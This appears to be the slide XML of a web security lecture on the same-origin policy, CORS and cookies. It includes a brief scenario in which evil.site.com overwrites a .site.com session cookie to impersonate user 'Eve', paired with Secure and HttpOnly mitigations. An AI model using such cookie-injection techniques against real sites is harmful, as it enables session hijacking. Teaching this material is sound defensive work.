              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cookies, DOM storage, DOM tree, JS namespace</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Each iframe/window gets the origin from its URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> or domain suffix except TLD (Top Level Domain)</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Scripts execute with authority of its frame’s origin</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Passive contents get zero authority </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>image has no access to the resource available to its origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="181" name="Google Shape;181;p39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5580436" y="734488"/>
            <a:ext cx="2988259" cy="1677959"/>
            <a:chOff x="5590050" y="1074650"/>
            <a:chExt cx="2686800" cy="1461000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="182" name="Google Shape;182;p39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5590050" y="1074650"/>
              <a:ext cx="2686800" cy="3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83" name="Google Shape;183;p39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6279800" y="1131950"/>
              <a:ext cx="1913700" cy="216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highlight>
                    <a:srgbClr val="FFFFFF"/>
                  </a:highlight>
                </a:rPr>
                <a:t>a.com</a:t>
              </a:r>
              <a:endParaRPr b="1">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="184" name="Google Shape;184;p39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5590050" y="1406150"/>
              <a:ext cx="2686800" cy="1129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 </a:t>
              </a:r>
              <a:endParaRPr b="1" u="sng"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="185" name="Google Shape;185;p39"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5590050" y="1160097"/>
              <a:ext cx="509775" cy="160600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Google Shape;186;p39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6975825" y="1498850"/>
            <a:ext cx="1244400" cy="744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b.com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0"/>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 Origin Resource Sharing </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;192;p40"/>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By default, the b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>rowser restricts cross-origin HTTP requests initiated from scripts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The server explicitly indicates any other origins that can access its resources through an HTTP-header. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The browser makes a “preflight” request to the server hosting the cross-origin resource, in order to check that the server will permit the actual request.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can add Access-Control-Allow-Origin (ACAO) header to tell the browser which origin is allowed to to access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1"/>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Cross Origin Resource Sharing </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Google Shape;198;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623400" y="809325"/>
            <a:ext cx="6305400" cy="18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ourier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>const xhr = new XMLHttpRequest();</a:t>
            </a:r>
            <a:endParaRPr b="1"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const url = 'http://bar.other/resources/public-data/';</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"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xhr.open('GET', url);</a:t>
            </a:r>
            <a:endParaRPr b="1"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xhr.onreadystatechange = someHandler;</a:t>
            </a:r>
            <a:endParaRPr b="1"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xhr.send();</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Google Shape;199;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055800" y="2846875"/>
            <a:ext cx="40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Java script on http://foo.example </a:t>
            </a:r>
            <a:endParaRPr u="sng"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Google Shape;200;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623400" y="3789575"/>
            <a:ext cx="7277400" cy="4617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1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS</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2"/>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Cross Origin Resource Sharing </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="Google Shape;206;p42"/>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42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1159500" y="841924"/>
            <a:ext cx="6913562" cy="38343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3"/>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Cross Origin Resource Sharing </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Google Shape;213;p43"/>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4" name="Google Shape;214;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="551463" y="818199"/>
            <a:ext cx="8041077" cy="3933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4"/>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Cookie</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Google Shape;220;p44"/>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A small piece of data sent from the server (a website) and stored in the browser.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Used to maintain some states since HTTP is stateless.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Contain Name and Value and various attributes: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>domain, path: origin. Should be set on the current resource's top domain and its sub domains, </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>expires: session cookie (expires when browser is closed) vs persistent cookie (expire some specific date/time in the future</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Secure: only transfer over encrypted connections such as HTTPS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Httponly: cannot accessed by client API (java script) (defeat XSS attacks)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ame site : strict/lax (XSRF)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Usage: session, authentication, personalization, tracking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5"/>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Cookie</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;226;p45"/>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Used to store state on client </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="227" name="Google Shape;227;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1695450" y="1624013"/>
            <a:ext cx="6057900" cy="3267075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Google Shape;228;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1695450" y="4794000"/>
            <a:ext cx="66261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“Stanford CS155 Lecture Notes”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8"/>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08" name="Google Shape;108;p28"/>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Web Security Lectures for CS155 at Stanford: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cs155.stanford.edu/lectures/08-web.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web Security Lecture Videos by MIT: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=chkFBigodIw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OWASP Top 10: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project</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6"/>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Cookie Read/Write</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="Google Shape;234;p46"/>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Server side</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Through HTTP response Set-cookie:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Default origin is domain and path of setting URL. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Domain can be any domain-suffix of URL, except TLD</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Login.site.com can set cookies for all .site.com, but not another site or TLD</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Client side: document.cookie</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Write: document.cookie = “ name = value; …”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Read: alert (document.cookie);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Delete: document.cookie = “name=; ..”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Same Origin Policy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Browser UI: read/delete cookies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7"/>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Cookie Security Problem</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Google Shape;240;p47"/>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Authentication: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A logs in at login.site.com which sets session-id cookie for .site.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A visits evil.site.com, which overwrites .site.com session-id cookie with session-id of user “Eve”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A visits course.site.com to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> homework, course.site.com thinks it is talking to Eve.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use Secure flag to send only over HTTPS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can be overwritten if has HTTP connection with the same or sub domain </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Set to HTTPonly to disallow script to access cookie</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8"/>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Cookie Security Problem</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Google Shape;246;p48"/>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Confidentiality</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can be easily eavesdropped if over HTTP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use Secure flag to send only over HTTPS, and always HTTPS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
